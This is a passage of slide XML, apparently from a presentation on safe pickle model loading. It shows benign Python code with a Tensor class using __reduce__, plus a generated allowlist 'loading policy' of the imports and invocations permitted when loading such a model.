                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__init__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, weights: Tensor):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.weights = weights</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>__reduce__</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>self</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>        return (read_weights_to_tensor, (self.filename,))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(filename: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>) -&gt; Tensor:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>    # Read a weights file and return a Tensor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Google Shape;813;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Python library source code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5645325" y="2155500"/>
            <a:ext cx="2756700" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Imports:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Allowed Invocations:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto Mono Light"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>read_weights_to_tensor</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="815" name="Google Shape;815;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5607550" y="1786200"/>
            <a:ext cx="27567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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Generated loading policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="816" name="Google Shape;816;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="817" name="Google Shape;817;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1471175" y="3131775"/>
            <a:ext cx="1721700" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Google Shape;818;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695025" y="2812375"/>
            <a:ext cx="548700" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162825" y="2606875"/>
            <a:ext cx="2103600" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="Google Shape;820;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
